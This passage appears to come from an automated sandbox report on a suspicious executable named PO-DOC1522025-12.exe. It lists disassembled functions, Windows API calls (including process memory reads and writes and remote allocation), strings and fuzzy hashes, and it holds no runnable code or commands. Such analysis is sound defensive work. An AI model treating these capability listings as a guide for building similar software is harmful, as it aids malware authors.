                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                    • String ID: x#!$x#!$x#!
                                                                                    • API String ID: 1072379062-1188481307
                                                                                    • Opcode ID: e40666b9e06393301e745f9437688d15699ff32b023f37174fcee374c4277ce0
                                                                                    • Instruction ID: 6640d66aa173ab0a0f924f4637b7b6b256548efe18c225b5c36e23d2762b4752
                                                                                    • Opcode Fuzzy Hash: e40666b9e06393301e745f9437688d15699ff32b023f37174fcee374c4277ce0
                                                                                    • Instruction Fuzzy Hash: E2C16971A00109ABCB24DF98C891EAEB7B9EF68340F14806DF9159B291DB70ED55CB90
                                                                                    APIs
                                                                                      • Part of subcall function 00160242: EnterCriticalSection.KERNEL32(0021070C,00211884,?,?,0015198B,00212518,?,?,?,001412F9,00000000), ref: 0016024D
                                                                                      • Part of subcall function 00160242: LeaveCriticalSection.KERNEL32(0021070C,?,0015198B,00212518,?,?,?,001412F9,00000000), ref: 0016028A
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001600A3: __onexit.LIBCMT ref: 001600A9
                                                                                    • __Init_thread_footer.LIBCMT ref: 001C7BFB
                                                                                      • Part of subcall function 001601F8: EnterCriticalSection.KERNEL32(0021070C,?,?,00158747,00212514), ref: 00160202
                                                                                      • Part of subcall function 001601F8: LeaveCriticalSection.KERNEL32(0021070C,?,00158747,00212514), ref: 00160235
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                                    • API String ID: 535116098-3733170431
                                                                                    • Opcode ID: 2b9e3998f04bbd0f4ab4911fbfc1702cf374c603953d9d64570343ec877d49ba
                                                                                    • Instruction ID: 409989bda0903a0f302c15e717b2f7a3a37e254df0e2d2e3e9c74889ca42df0a
                                                                                    • Opcode Fuzzy Hash: 2b9e3998f04bbd0f4ab4911fbfc1702cf374c603953d9d64570343ec877d49ba
                                                                                    • Instruction Fuzzy Hash: 77915A70A04209AFCB14EF94D891EBDB7B2AF69300F54805DF8069B292DBB1EE45DB51
                                                                                    APIs
                                                                                      • Part of subcall function 001AB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001A21D0,?,?,00000034,00000800,?,00000034), ref: 001AB42D
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001A2760
                                                                                      • Part of subcall function 001AB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001A21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 001AB3F8
                                                                                      • Part of subcall function 001AB32A: GetWindowThreadProcessId.USER32(?,?), ref: 001AB355
                                                                                      • Part of subcall function 001AB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001A2194,00000034,?,?,00001004,00000000,00000000), ref: 001AB365
                                                                                      • Part of subcall function 001AB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001A2194,00000034,?,?,00001004,00000000,00000000), ref: 001AB37B
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001A27CD
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001A281A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: 08d33ada49225c7ee8b6a5afa9991417f3cb84114bb28f8d03a74277def9c077
                                                                                    • Instruction ID: 749c1f983208ed85fa35b5715582d1531fc416ee48ea5c42dfdef7e1f5811108
                                                                                    • Opcode Fuzzy Hash: 08d33ada49225c7ee8b6a5afa9991417f3cb84114bb28f8d03a74277def9c077
                                                                                    • Instruction Fuzzy Hash: FB413D76901218BFDB10DFA4CD81AEEBBB8EF1A300F004055FA55B7191DB706E85CBA0
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO-DOC1522025-12.exe,00000104), ref: 00171769
                                                                                    • _free.LIBCMT ref: 00171834
                                                                                    • _free.LIBCMT ref: 0017183E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\Desktop\PO-DOC1522025-12.exe
                                                                                    • API String ID: 2506810119-3414669749
                                                                                    • Opcode ID: 08d7852d25cec00e960b4283675515078ac58d08f7642d51255db3fdebae6fd8
                                                                                    • Instruction ID: fce55722430450fa2887245692c80eaf782a493cd68275f2ef630f8c73db744c
                                                                                    • Opcode Fuzzy Hash: 08d7852d25cec00e960b4283675515078ac58d08f7642d51255db3fdebae6fd8
                                                                                    • Instruction Fuzzy Hash: 2E316F71A40218BBDB25DF999885D9EBBFCEBA5310B14816AE90897211DB708A41CB91
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001AC306
                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 001AC34C
                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00211990,00B858C8), ref: 001AC395
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                    • String ID: 0
                                                                                    • API String ID: 135850232-4108050209
                                                                                    • Opcode ID: 64e57ecb694033376104d46c54aa31e7701561c6e94279b43821aab5ab378cb9
                                                                                    • Instruction ID: dcb35d537a9338c044de16deb91eecc945f4c4132f54ed1fb575526816807746
                                                                                    • Opcode Fuzzy Hash: 64e57ecb694033376104d46c54aa31e7701561c6e94279b43821aab5ab378cb9
                                                                                    • Instruction Fuzzy Hash: CA41C5352083019FDB24DF25D884B6BBBE4BF96310F008A1DF965972D1D770E904CB92
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001DCC08,00000000,?,?,?,?), ref: 001D44AA
                                                                                    • GetWindowLongW.USER32 ref: 001D44C7
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001D44D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: f6bcb5ae5029a9092c618e4b3bdccdc48eae330685aa43be84136e485ab53025
                                                                                    • Instruction ID: 8e42c2e49ac225311bd2e7b0bfa6f2bdd94db44df63a4ec09883645e99bfebeb
                                                                                    • Opcode Fuzzy Hash: f6bcb5ae5029a9092c618e4b3bdccdc48eae330685aa43be84136e485ab53025
                                                                                    • Instruction Fuzzy Hash: 77319E31210206AFDF208F38DC45BEA77A9EB09334F204716F975922E0D770EC909750
                                                                                    APIs
                                                                                      • Part of subcall function 001C335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,001C3077,?,?), ref: 001C3378
                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001C307A
                                                                                    • _wcslen.LIBCMT ref: 001C309B
                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 001C3106
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                    • String ID: 255.255.255.255
                                                                                    • API String ID: 946324512-2422070025
                                                                                    • Opcode ID: 06a0bb487772afe906e6444c99d9217cb0a448d186d216e34b932f46e3e281fc
                                                                                    • Instruction ID: 173945ad76c0ba0ad476d1e40bf2277cf21ce2eb61041209446e18ccbed591fd
                                                                                    • Opcode Fuzzy Hash: 06a0bb487772afe906e6444c99d9217cb0a448d186d216e34b932f46e3e281fc
                                                                                    • Instruction Fuzzy Hash: 8731E7362002059FCB10CF68C485FAA77E0EF64318F29C05DE9268B792DB32DE41C761
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001D4705
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001D4713
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001D471A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: 4f4987ad6de79eb9d83c8f24e51d908e53108001302b15b80841cf8238937817
                                                                                    • Instruction ID: de7d3403f66670bc92df98a2b06595a1a37971c619ebfcbacf42dd74421514e7
                                                                                    • Opcode Fuzzy Hash: 4f4987ad6de79eb9d83c8f24e51d908e53108001302b15b80841cf8238937817
                                                                                    • Instruction Fuzzy Hash: 0E216DB5601209AFDB10DF64DCC5DB737ADEF5A3A4B04055AFA009B3A1CB31EC61CAA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                    • API String ID: 176396367-2734436370
                                                                                    • Opcode ID: ccc296505cc10839d2bdb7db2f63df789ca4ddc2f465c0dee515076ff6de0342
                                                                                    • Instruction ID: bfa7f76497f60578d843411cb2261d364b948ef7a0b605d2d22b3fe719605d73
                                                                                    • Opcode Fuzzy Hash: ccc296505cc10839d2bdb7db2f63df789ca4ddc2f465c0dee515076ff6de0342
                                                                                    • Instruction Fuzzy Hash: F021573660422066D335AB349C03FBB73D89FA6300F11442BF94E97181EB51AED6C2D5
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001D3840
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001D3850
                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001D3876
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: 315006e30887a9a4f5ac27230553c22aa549127b93415c6da5b67dad42bd81e7
                                                                                    • Instruction ID: 5887ea9ba604a68a86806f2a913e453fd3b31b56180094e4b1aeb51c1bc63702
                                                                                    • Opcode Fuzzy Hash: 315006e30887a9a4f5ac27230553c22aa549127b93415c6da5b67dad42bd81e7
                                                                                    • Instruction Fuzzy Hash: 8021BE72610219BBEF218F54DC85FAB376AEF89750F118126FA109B290CB71EC5297A0
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 001B4A08
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001B4A5C
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,001DCC08), ref: 001B4AD0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                    • String ID: %lu
                                                                                    • API String ID: 2507767853-685833217
                                                                                    • Opcode ID: 6599b33f3124f64663e4d78b99c4bc344553561b1f02643f0e2e9d1b0fed99fb
                                                                                    • Instruction ID: b31b5ab45a94ccba4ff775f5d0f440f77945fea0f93d498c7855ddd872fecf07
                                                                                    • Opcode Fuzzy Hash: 6599b33f3124f64663e4d78b99c4bc344553561b1f02643f0e2e9d1b0fed99fb
                                                                                    • Instruction Fuzzy Hash: 78315075A00119EFD710DF64C885EAA77F8EF05308F148495F909DB262D771ED46CBA1
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001D424F
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001D4264
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001D4271
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: f011bb83809de0c5b0c311d7096a49e06ab6e47ae2c3bcdf924b5c7a2d7bcb45
                                                                                    • Instruction ID: 2e719307480e14e0b4d0381848db33416e8804f314b8ebe5ee63e306457a8b47
                                                                                    • Opcode Fuzzy Hash: f011bb83809de0c5b0c311d7096a49e06ab6e47ae2c3bcdf924b5c7a2d7bcb45
                                                                                    • Instruction Fuzzy Hash: 1411E072240208BFEF209E28DC06FAB3BACEF95B64F110525FA55E21A0D771D8619B20
                                                                                    APIs
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                      • Part of subcall function 001A2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001A2DC5
                                                                                      • Part of subcall function 001A2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 001A2DD6
                                                                                      • Part of subcall function 001A2DA7: GetCurrentThreadId.KERNEL32 ref: 001A2DDD
                                                                                      • Part of subcall function 001A2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001A2DE4
                                                                                    • GetFocus.USER32 ref: 001A2F78
                                                                                      • Part of subcall function 001A2DEE: GetParent.USER32(00000000), ref: 001A2DF9
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 001A2FC3
                                                                                    • EnumChildWindows.USER32(?,001A303B), ref: 001A2FEB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                    • String ID: %s%d
                                                                                    • API String ID: 1272988791-1110647743
                                                                                    • Opcode ID: 710d5472d9ea923a56d2fdc177f1298bd36ceb90e5121f50aa459475b7956805
                                                                                    • Instruction ID: baf566782493350b7025b0c3497a79246045fd9981e7ec0d60f3d0977a9ec3c5
                                                                                    • Opcode Fuzzy Hash: 710d5472d9ea923a56d2fdc177f1298bd36ceb90e5121f50aa459475b7956805
                                                                                    • Instruction Fuzzy Hash: A911A279700205ABCF147FA48C85FEE376AAFA6308F044075FD199B292DF309949CB60
                                                                                    APIs
                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001D58C1
                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001D58EE
                                                                                    • DrawMenuBar.USER32(?), ref: 001D58FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                    • String ID: 0
                                                                                    • API String ID: 3227129158-4108050209
                                                                                    • Opcode ID: 3d6930f33411f88a950a7d173c10a63b14081380e34694965fdb1e1038350f1c
                                                                                    • Instruction ID: 388d49f354aea0c43a4c3182e049f0de67b55ee934e057a3a864726af393f383
                                                                                    • Opcode Fuzzy Hash: 3d6930f33411f88a950a7d173c10a63b14081380e34694965fdb1e1038350f1c
                                                                                    • Instruction Fuzzy Hash: 2101C031600218EFDB209F15EC45BAEBBB9FF45361F00809AE848DA251DB308A85DF21
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0019D3BF
                                                                                    • FreeLibrary.KERNEL32 ref: 0019D3E5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeLibraryProc
                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                    • API String ID: 3013587201-2590602151
                                                                                    • Opcode ID: 28feff0ee3426bfcc4d5010bd25c7d6a2f38430cb224143079815edde21938fe
                                                                                    • Instruction ID: cb5326269a2c2e966aceee3a7f4d4ff281f1b98660161e2d45574c09d0915009
                                                                                    • Opcode Fuzzy Hash: 28feff0ee3426bfcc4d5010bd25c7d6a2f38430cb224143079815edde21938fe
                                                                                    • Instruction Fuzzy Hash: 42F02BB1406723DBDF3C6B24AD489AA3318BF11742B95875AF423F10D5DB70CE86C682
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f5c5ccb5473f9f4e7c3eee5605f9242c698286ee98afed27a0fcb4d1d3e3b258
                                                                                    • Instruction ID: 1debe85afaceadc88d4a9c85c6ae1f9b2ef1a6574f129f8e36797e3d6c1f0733
                                                                                    • Opcode Fuzzy Hash: f5c5ccb5473f9f4e7c3eee5605f9242c698286ee98afed27a0fcb4d1d3e3b258
                                                                                    • Instruction Fuzzy Hash: 18C15B79A0020AEFDB15CFA4C894BAEB7B5FF49304F218599E505EB251D731EE81CB90
                                                                                    APIs
                                                                                    Memory Dump Source
